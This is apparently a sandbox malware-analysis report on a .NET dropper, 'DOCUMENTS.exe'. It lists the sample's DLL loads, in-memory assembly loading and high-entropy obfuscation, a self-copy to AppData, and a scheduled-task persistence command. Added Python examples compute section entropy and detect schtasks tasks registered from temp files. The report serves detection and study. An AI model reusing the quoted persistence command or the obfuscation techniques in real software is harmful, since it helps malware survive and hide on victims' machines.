                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: DOCUMENTS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DOCUMENTS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: DOCUMENTS.exe, MainForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: DOCUMENTS.exe, MainForm.cs | .Net Code: InitializeComponent contains xor as well as GetObject
Source: bgURAojpNNIb.exe.1.dr, MainForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: bgURAojpNNIb.exe.1.dr, MainForm.cs | .Net Code: InitializeComponent contains xor as well as GetObject
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.cs | .Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
Source: 1.2.DOCUMENTS.exe.2d92488.0.raw.unpack, SQL.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.DOCUMENTS.exe.6f20000.5.raw.unpack, SQL.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.cs | .Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.cs | .Net Code: UHAZkFwJKI System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06693AD7 push ebx; retf 13_2_06693ADA
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Code function: 14_2_0714CB59 pushfd ; ret 14_2_0714CB61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 18_2_05F73AD7 push ebx; retf 18_2_05F73ADA
Source: DOCUMENTS.exe | Static PE information: section name: .text entropy: 7.931627472756141
Source: bgURAojpNNIb.exe.1.dr | Static PE information: section name: .text entropy: 7.931627472756141
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.cs | High entropy of concatenated method names: 'RmW9wMr1Kw', 'HNd9tTvrBH', 'drt9SIWftM', 'N1G9ESSXKx', 'vYj9L805Fn', 'nH09y9fQwr', 'g2n9gRK3oj', 'WgM9XfDBau', 'QnG9rBQUMN', 'OZ79b4Jl2u'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, CqkSLPQiyRDSGvpgix.cs | High entropy of concatenated method names: 'IA9Kv9bul2', 'TDGK0qQB5m', 'FshKMa7bPO', 'ctEKPFsAxg', 'B2ZKTPIEB5', 'K0MK5jy9xl', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, FmqJHSBUqwQ8k8Y35x.cs | High entropy of concatenated method names: 'HhZVRD33cv', 'xmtV92HqMD', 'nUGVZqOQUi', 'j3fVt7lx1l', 'RiwVS5cUAr', 'DFPVL5BN91', 'QRdVyh6485', 'xJTKsvk4aY', 'vgJKYj10Xi', 'JHWKpu0mvr'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IGjS0iv8mM3ch1TwcX.cs | High entropy of concatenated method names: 'wDxRgJai9c', 'eKfRXal9sM', 'HTBRbcGIlB', 'DAnRnIjeHJ', 'pggRi9lswZ', 'fwxRed4SNf', 'drZaatdK5AHA9bSgst', 'Qtx6FSYZXfmZCEl4y2', 'qy1RRpWLK1', 'vXnR9eM2lT'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, nuFdc3YgMd8jqlL8i7D.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLWDT0bQJE', 'mLeDO4eWJJ', 'dnyDJwP0AG', 'wfjDch7kXw', 'rFeDuwh4Ep', 'wBEDIQTM4Z', 'aTLDs2o1k0'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, XDn3FpsXEn90n0HiPU.cs | High entropy of concatenated method names: 'Y1QgCvhYhh', 'aW4gG2ES3n', 'uu8gk3VZwN', 'I0agx7QMOt', 'zv7gW1p7Wm', 'hl7g2WhUmk', 'Koyg8n1kGg', 'EI8gmeVq0n', 'BWRgHefVOH', 'PpUg1UcR4j'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, xmOcDpHNNX8lBExIDd.cs | High entropy of concatenated method names: 'oILLWGWEo1', 'wNuL8E7RuY', 'iCXEM6uoBy', 'js0EPxXMLM', 'SLTE5Om7NR', 'TZrEdVJMmQ', 'L4ZEhsOZiK', 'VTwENcTx20', 'OD8E6krOgJ', 'iFsEqBK5jT'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, iHtn2JKYOqRtpcQHmC.cs | High entropy of concatenated method names: 'Pvy3YKDuJl', 'nay3QI5QEo', 'BlFKUlLBQT', 'f7KKRBsIqJ', 'V4W3lLcmZq', 'A333oJkRbd', 'SQG37OSIIf', 'rB43TEF6vI', 'KrD3ONM7Wb', 'tCV3J3KQvf'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, dpJ4X47JnBRnja5sBA.cs | High entropy of concatenated method names: 'FQ8Ktt1Gg2', 'aKVKSaWkey', 'bZAKEowFvP', 'dHBKL74V1A', 'E3kKytTypC', 'QZjKgpuasS', 'UAGKXge7EN', 'FIYKryV22a', 'CynKbVbGCo', 'QkdKntVNhy'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, qWCsH5q5S6cIyfTUWn.cs | High entropy of concatenated method names: 'UVQExdQmri', 'P3IE2tpuIP', 'j2ZEmokpas', 'PbyEHZwXOk', 'klNEipkch0', 'DptEepxruU', 'kHME3YgdaQ', 'HO7EKK0Ycu', 'hewEVsIA6L', 'FQuEDLnh3m'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, itavA5064CpfMkCRx8.cs | High entropy of concatenated method names: 'Dispose', 'gi6Rp0gVot', 'yjpF0ggf9a', 'qCtff7xLHB', 'y3URQILg6c', 'Nt7RzIaZei', 'ProcessDialogKey', 'lTXFUploL3', 'APxFRHvtNd', 'T0YFFYFkID'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, c6Xl83zSDdmAH1RGoD.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'se1VaI6HHE', 'NkwVitp3v5', 'ursVeXhB4e', 'c0FV34xfSm', 'bZ0VKTRwAU', 'uNOVV0XcEt', 'VRbVDQvcj7'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oDEPGtaZ6ry5IcnYBf.cs | High entropy of concatenated method names: 'XTYST6Bi8d', 'uYnSOnJgNW', 'sM7SJGRQE5', 'b2UScV4tH3', 'jKASuYpDB5', 'fZrSI1U1hm', 'cllSsG54jD', 'uTeSYOQn4n', 'xn1Spus5Au', 'eDLSQcubdD'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oPRCmrAx6DKALUJu4K.cs | High entropy of concatenated method names: 'VVM3bts0gv', 'AFK3n1jdty', 'ToString', 'TZS3tmAhSh', 'Kxg3SN47hj', 'Uft3EyXyrm', 'OC43LclFFu', 'iGc3yDhDFi', 'O103gG5h8k', 'qjL3XsutDx'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, ElQsm1Z1Vvnmg6hSYw.cs | High entropy of concatenated method names: 'X0DiqM2aLG', 'g31iortRwN', 'm26iTjCNLF', 'rnciOrSAUJ', 'U9Di0wamhe', 'fM2iMZ9l5i', 'sgJiPryiwT', 'CN5i5hlvhm', 'Q5bid2FYg6', 'QyBihETmpL'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, abfOueY15F0v0aZ5JmG.cs | High entropy of concatenated method names: 'lwZVCfS2OT', 'OECVGXBxxL', 'krXVkkkCDl', 'zyPVxXtVvd', 'aB1VWBODg1', 'YkpV2ruoh0', 'mMZV8OMvEF', 'UEcVm3Uf88', 'v4ZVHbbjnL', 'j74V1xDTA8'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, Q2fehlnnO9kNBjg725.cs | High entropy of concatenated method names: 'O4GamZBUsB', 'cKqaHwf9Hd', 'KyYavLSZnb', 'XCEa0GciGK', 'lsAaPUoJih', 'i15a5vJIOa', 'zvcahihFdc', 'a48aNj5E40', 'NMxaqa3AhH', 'Qnial6iTMt'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, Cu0XhNdbCSE50TeKpT.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oOMFpy2IfL', 'FXgFQCl15K', 'CwKFzvCgKU', 'yin9UKlrAJ', 'ReA9RrEu5l', 'rcH9Flbx58', 'tdN9952IZ0', 'SiwYcmx2TF9FEseluVx'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, mb0GRbFFLjLV5BDW7f.cs | High entropy of concatenated method names: 'gnGyw7L2ty', 'R0jySKNs9L', 'NAWyLhtc1H', 'KOCyg1lAUi', 'U8gyXMsqCk', 'ITuLuSFlxs', 'krNLIE7ggF', 'tYRLsdWeDb', 'PlILYXA3kF', 'sAoLps2DXp'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, aQ22UkNAfMBbqUNii2.cs | High entropy of concatenated method names: 'sJ5kNkWDG', 'ReaxGqukX', 'gkN25xnvL', 'wqe8NU86G', 'IoaHmvWnD', 'Ocy1rI95f', 'RRkTKk8d94ouZ1j2LQ', 'woANyjbUl0LpOaC0U3', 'SkfKOdafs', 'otPDMpxi2'
Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, ySxHLLb1AFMFrZukA4.cs | High entropy of concatenated method names: 'fSlgthrAZC', 'aXBgEjAAmn', 'Xfegypu0kV', 'rP3yQJvTta', 'PGYyzUorG0', 'v8ggUAs43q', 'kMdgRA0fOj', 'BclgFJNhaj', 'rUng9i6LZs', 'RsegZ811Ad'
Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack | High entropy of concatenated method names: identical findings for the same 21 classes (IjXwZhEmRlUu1fW5B2.cs through ySxHLLb1AFMFrZukA4.cs) and the same method-name sets as listed for 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack above
Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack | High entropy of concatenated method names: identical findings for the same 21 classes (IjXwZhEmRlUu1fW5B2.cs through ySxHLLb1AFMFrZukA4.cs) and the same method-name sets as listed for 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack above
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
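The ".text entropy: 7.93" findings above are the static side of the Assembly.Load(byte[]) obfuscation: a section of real x86 or .NET code is far less dense than that, so a near-8.0 value means the section is mostly compressed or encrypted payload waiting to be unpacked in memory. The following Python is an added example, not Joe Sandbox code, that reproduces the check with the standard library only: a minimal PE section-table parser, Shannon entropy per section, and a threshold. The threshold value, the constructed two-section sample image and its seeded-random "code" bytes are all assumptions made for the demonstration.

```python
"""Per-section Shannon entropy of a PE, the heuristic behind the
".text entropy: 7.93" findings above. Added example (not Joe Sandbox code);
standard library only, and the PE parsing covers just the DOS header,
COFF header and section table that the check needs."""
import math
import random
import struct
from collections import Counter

# Assumption: a code section this dense is compressed or encrypted; plain
# x86/.NET code normally lands well below this.
PACKED_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(blob: bytes):
    """Yield (name, raw_bytes) for every entry in the PE section table."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        hdr = table + i * 40
        name = blob[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, hdr + 16)
        yield name, blob[raw_ptr:raw_ptr + raw_size]


def section_entropies(blob: bytes) -> dict:
    return {name: round(shannon_entropy(data), 3) for name, data in pe_sections(blob)}


def suspicious_sections(blob: bytes, threshold: float = PACKED_THRESHOLD) -> list:
    return [name for name, ent in section_entropies(blob).items() if ent >= threshold]


def build_sample_pe(text: bytes, rdata: bytes) -> bytes:
    """Constructed two-section PE32 image, only to exercise the parser offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew -> right after DOS header
    opt_size = 0xE0                                       # PE32 optional header length
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    text_ptr = 0x40 + 4 + 20 + opt_size + 2 * 40          # raw data follows the headers
    rdata_ptr = text_ptr + len(text)

    def header(name, data, ptr):
        return struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0)

    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt_size)
            + header(b".text", text, text_ptr) + header(b".rdata", rdata, rdata_ptr)
            + text + rdata)


# Constructed inputs: a seeded-random "code" section standing in for the
# encrypted payload, and an ordinary strings section for contrast.
_rng = random.Random(7)
SAMPLE_TEXT = bytes(_rng.getrandbits(8) for _ in range(64 * 1024))
SAMPLE_RDATA = b"Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe\0" * 200 + bytes(2048)
SAMPLE_PE = build_sample_pe(SAMPLE_TEXT, SAMPLE_RDATA)

if __name__ == "__main__":
    for name, ent in section_entropies(SAMPLE_PE).items():
        print(f"{name:8s} entropy={ent:.3f}")
    print("packed/encrypted candidates:", suspicious_sections(SAMPLE_PE))
```

Pointed at a real file, `section_entropies(open(path, "rb").read())` gives the same per-section numbers the report shows. Note that DOCUMENTS.exe and the dropped bgURAojpNNIb.exe report the identical value 7.931627472756141, which is what a byte-for-byte copy of the original into AppData\Roaming would produce.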

Boot Survival

Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
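The persistence step above is a single process-creation event: the sample writes a task definition to a .tmp file under AppData\Local\Temp and registers it with schtasks /Create /XML, the pattern behind the "Scheduled temp file as task from temp location" Sigma hit in the signature list. The following Python is an added detection example, not Joe Sandbox or Sigma code: it tokenises a Windows command line, picks out the /Create, /TN and /XML arguments, and alerts when the XML path sits in a temp directory. The log lines are constructed and their "Image / ParentImage / CommandLine" layout mimics Sysmon event 1 fields; that layout, the temp-directory list and the benign comparison events are assumptions for the demonstration.

```python
"""Detection for the persistence step above: schtasks.exe registering a task
from an XML file staged in a temp directory, the pattern behind the
"Scheduled temp file as task from temp location" Sigma hit. Added example,
not Joe Sandbox or Sigma code. The log lines are constructed; their
"Image / ParentImage / CommandLine" layout mimics Sysmon event 1 fields and
is an assumption about the log source, not something the report shows."""
import re
import shlex

# Staging locations a packaged installer has no reason to write a task XML to.
TEMP_DIR_RE = re.compile(
    r"(?:\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|^%TEMP%\\)", re.IGNORECASE)


def split_windows_cmdline(cmdline: str) -> list:
    """Split on whitespace honouring double quotes; non-POSIX mode leaves
    backslashes alone, then the surrounding quotes are stripped."""
    try:
        return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]
    except ValueError:                      # unbalanced quote: fall back to a plain split
        return cmdline.split()


def analyze_schtasks(cmdline: str):
    """Return a finding dict for a 'schtasks /Create' command line, else None."""
    tokens = split_windows_cmdline(cmdline)
    if not tokens or not tokens[0].lower().endswith("schtasks.exe"):
        return None
    flags, i = {}, 1
    while i < len(tokens):                  # /Flag [value] pairs, case-insensitive
        key = tokens[i].lower()
        if key.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            flags[key] = tokens[i + 1]
            i += 2
        else:
            flags[key] = True
            i += 1
    if "/create" not in flags:
        return None
    xml = flags.get("/xml")
    return {
        "task_name": flags.get("/tn"),
        "xml_path": xml if isinstance(xml, str) else None,
        "xml_from_temp": bool(isinstance(xml, str) and TEMP_DIR_RE.search(xml)),
    }


def parse_event(line: str) -> dict:
    """'Key: value | Key: value' record into a dict (constructed log layout)."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def scan_log(lines) -> list:
    """Alert on every schtasks /Create whose /XML points into a temp directory."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        finding = analyze_schtasks(ev.get("CommandLine", ""))
        if finding and finding["xml_from_temp"]:
            finding["parent_image"] = ev.get("ParentImage")
            alerts.append(finding)
    return alerts


# Constructed events: the sandbox's schtasks call, a benign vendor task, a query.
SAMPLE_LOG = [
    r'Image: C:\Windows\SysWOW64\schtasks.exe | ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe'
    r' | CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb"'
    r' /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"',
    r'Image: C:\Windows\System32\schtasks.exe | ParentImage: C:\Program Files\Vendor\setup.exe'
    r' | CommandLine: schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"',
    r'Image: C:\Windows\System32\schtasks.exe | ParentImage: C:\Windows\System32\cmd.exe'
    r' | CommandLine: schtasks.exe /Query /TN "Updates\bgURAojpNNIb"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"task {alert['task_name']!r} created from {alert['xml_path']} by {alert['parent_image']}")
```

On a live host the alert gives a responder the two artefacts to pull before the .tmp file is cleaned up: the task itself (`schtasks /Query /TN "Updates\bgURAojpNNIb" /XML` dumps the registered definition, which records the action the task runs) and the parent process, here the dropper that also wrote bgURAojpNNIb.exe to AppData\Roaming.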

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 times)
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process information set: NOOPENFILEERRORBOX (37 times)
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (208 occurrences; SetErrorMode called with SEM_NOOPENFILEERRORBOX)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
